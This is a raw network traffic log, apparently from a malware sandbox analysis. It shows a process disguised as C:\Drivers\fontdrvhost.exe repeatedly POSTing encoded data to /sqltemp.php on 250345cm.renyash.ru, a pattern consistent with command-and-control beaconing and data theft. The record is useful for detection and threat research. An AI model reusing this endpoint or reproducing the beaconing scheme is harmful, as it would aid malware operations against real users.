                                                                                                                                                                                            Jan 1, 2025 14:52:31.560277939 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:31.836441994 CET951INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:31 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BfKsTcfxtrILjrE3xNBhVHM0VyFV6jDYdhtAkwSDCaF1G08RmMXXyynnQB3bndv4R6JIc8sRmias2cmoHeQPGF9lRgDJYxqiyua%2BP%2BcsbfnxSptzG1DDlQi21wm2KTQlEJTmLVuA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd84fb180ca0-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4766&min_rtt=1663&rtt_var=6831&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=55106&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 55 3d 3e 32 1e 26 22 2b 03 3f 04 2f 55 26 3e 31 05 3c 3b 36 5d 24 2e 27 59 3d 2a 37 11 22 2c 31 12 32 16 0a 1d 20 3d 33 11 33 0e 2b 59 05 1c 23 1a 36 3c 2f 00 3e 3e 24 00 25 3c 21 58 26 3e 23 07 2a 28 24 53 37 38 20 07 27 03 24 1e 2a 2a 2c 1e 27 2c 24 07 2f 2f 2a 0b 26 2a 2c 54 00 11 26 54 24 08 24 5e 34 37 2b 01 22 57 3e 03 32 1a 2a 15 24 3c 2f 54 23 2a 3a 5e 31 1c 0e 01 36 0a 3d 07 32 2b 26 03 20 3d 0d 51 3d 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%U=>2&"+?/U&>1<;6]$.'Y=*7",12 =33+Y#6</>>$%<!X&>#*($S78 '$**,',$//*&*,T&T$$^47+"W>2*$</T#*:^16=2+& =Q=.%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            34192.168.2.449781104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:31.259345055 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:31.605093956 CET1008OUTData Raw: 56 56 5f 5d 54 5b 54 5d 58 56 52 59 56 59 59 56 5b 5a 54 50 55 58 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VV_]T[T]XVRYVYYV[ZTPUXP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[&,*4-'=(;)1!='?90*,]723\+;!1.:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:52:31.722676039 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:31.985232115 CET812INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:31 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yI7G0COESeYoXJ%2F8lbcSj3PVrqsHjIN%2FiHHxG1OX6%2Bsle01frUh2lc%2BaAEr6moOnZZomYU13%2FOrhjcCftxSs%2FQqni4zBv1w9Yzox9t6evHx7U25s9rikUMDisD5u7%2FAOJ4IVahFm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd85fc8d4343-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4058&min_rtt=1713&rtt_var=5334&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=71289&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            35192.168.2.449782104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:32.103571892 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:52:32.451190948 CET1012OUTData Raw: 56 54 5f 53 54 50 51 50 58 56 52 59 56 5d 59 57 5b 53 54 5f 55 55 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VT_STPQPXVRYV]YW[ST_UUP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^'?9Z#/20>(8%R .8<:<*. T/Y+;%#V9&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:52:32.578933001 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:32.843348980 CET800INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:32 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ev9O4HeEj5hXWUIcTHwwNBRkUajlAIz31ExBaYPaApwNEStFMJ7Z0mckSbvb6DQryKNeqmDmfyDfnEnwIBxcnkIbUQ2Se1bNBGgevx7SQjxB8PLiitUVQewdTbU6Bva1XWF4u%2FEy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd8b5b6f5e5f-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4361&min_rtt=1623&rtt_var=6084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=62056&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            36192.168.2.449783104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:32.963529110 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:33.308507919 CET1012OUTData Raw: 53 54 5f 56 51 58 51 56 58 56 52 59 56 5e 59 5e 5b 5e 54 5d 55 5c 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_VQXQVXVRYV^Y^[^T]U\PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._0<& ';E8 .8[(93V)= 73X(]&1::&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:33.426918983 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:33.682763100 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:33 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ve3nUdu2iW9IALpxbb11p6HXsyfJP9VwhExP5%2F55V0WD%2BiSQ%2BdkoLn5qbeV5BsTli%2Bs83Yo9E4sXdrg31RtYoKZdyaxzSHGxWjbZcm5Vs%2Fe%2FJgMebuKq4wZGOygUMI7ZDqQLL5P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd909fa41906-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7617&min_rtt=1474&rtt_var=12838&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=28843&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X
                                                                                                                                                                                            Jan 1, 2025 14:52:33.773332119 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            37192.168.2.449784104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:33.929259062 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:34.276952028 CET1012OUTData Raw: 53 57 5f 54 54 58 54 56 58 56 52 59 56 5c 59 54 5b 5a 54 5c 55 5e 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_TTXTVXVRYV\YT[ZT\U^PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._&/: ?=0+8&#<Y+7W>'#(+:$/U-*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:34.376506090 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:34.644387007 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:34 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUK0DJ7HMeQ%2B9hftAJZrBEqsygX%2FnWXI53nU16FWuKqM8WROAS7oms9mRfddnCejK59Pf6qmwoi%2BjsibdkHN5dFaXdUDeo2YIidktPWdPpABrOXchem7P0%2BFlnWNzCDfHpdhSy05"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd969dbfde97-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3748&min_rtt=1479&rtt_var=5094&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=74349&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            38192.168.2.449785104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:34.775681019 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:35.120800018 CET1008OUTData Raw: 56 5f 5f 55 54 5f 54 55 58 56 52 59 56 59 59 52 5b 5e 54 59 55 58 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__UT_TUXVRYVYYR[^TYUXP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z$" 3;;!V!=/<'*X?#1?(5C%<'W.*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:35.240478992 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:35.421550989 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:35 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BNOK6cJBZkJM4YyR7vsw0HgTZ30zEQFghpyBhzrw%2BPsF%2Bs1DlNvjJl4J1MAnpZV7Nao8Kx5Bb8afvoMZrMOoap1XtrCJKKiPF8BJAbuTYEwZIf3KRel1kfWKTplbuYzxhyG%2BNAU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fd9bfb8d42d2-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3899&min_rtt=1749&rtt_var=4957&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=77020&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            39192.168.2.449786104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:35.542504072 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:35.902036905 CET1012OUTData Raw: 56 55 5f 56 51 58 54 55 58 56 52 59 56 5a 59 51 5b 5f 54 5a 55 5d 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VU_VQXTUXVRYVZYQ[_TZU]P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'#3X;A,9!U .,?*$*-#42+.$,4::&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:52:35.991522074 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:36.259244919 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:36 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlNhQp5GyJHfcqXE5ha%2FwwurflNitlRg64MMW4U0dsceou8%2FN%2BGWiq0Tth4hX64K8p76SzmVEoa3Ku7ptVUEqW0uWBmH%2FgGAWB8PY3U0r25g6qJP8fTmUhx80ki8Uph8DItfehpI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fda0abe94408-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2573&min_rtt=2128&rtt_var=1689&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=256365&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            40192.168.2.449787104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:36.387100935 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:36.745752096 CET1012OUTData Raw: 56 5f 5a 57 54 59 51 52 58 56 52 59 56 5c 59 5e 5b 5a 54 5f 55 5e 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V_ZWTYQRXVRYV\Y^[ZT_U^PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0Y=X#$B/\> =$X(_;S*- X4,(5E&/ .&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:52:36.831913948 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            41192.168.2.449788104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:36.845633030 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:37.198889971 CET1852OUTData Raw: 56 56 5f 54 51 5f 54 56 58 56 52 59 56 5e 59 50 5b 53 54 5f 55 58 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VV_TQ_TVXVRYV^YP[ST_UXP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$?5X4<&'=(,\9R4=<_7)X47+]61<?-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:52:37.313612938 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:37.651196003 CET959INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:37 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g70hzTlciYVNm09TXtyp4lGKaBLrceWPDkz0OOIGCrhNXBLwvM%2BPmgZKMiyDUkYy%2BZ2Ba35tHTRRWG6ET%2Flqbz3zV87fOQSwuCIJkVAtd3D2%2BndznaU3tKcknJn%2FF6Yt8%2BkVl3BY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fda8eda80f4f-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4855&min_rtt=1721&rtt_var=6914&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=54483&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 0e 3e 3d 29 09 25 1c 24 5a 2a 2d 23 54 31 3e 0b 01 3c 3b 29 01 27 2e 0e 03 29 07 05 58 21 5a 36 03 31 38 28 5b 21 2d 3b 5b 33 0e 2b 59 05 1c 23 1c 22 2f 3c 5f 29 3d 05 58 32 3f 3d 59 24 2e 28 1b 3c 38 37 0d 20 28 3b 1d 24 3d 1a 5a 29 5c 2f 0b 26 2f 23 5f 2d 3c 29 55 33 2a 2c 54 00 11 25 0d 30 0f 38 5c 20 27 20 10 20 21 3a 02 31 1a 29 08 26 3c 20 0c 34 07 00 1b 26 21 2f 1d 22 0a 3a 5b 31 15 29 11 20 5b 37 55 3d 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&>=)%$Z*-#T1><;)'.)X!Z618([!-;[3+Y#"/<_)=X2?=Y$.(<87 (;$=Z)\/&/#_-<)U3*,T%08\ ' !:1)&< 4&!/":[1) [7U=%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            42192.168.2.449789104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
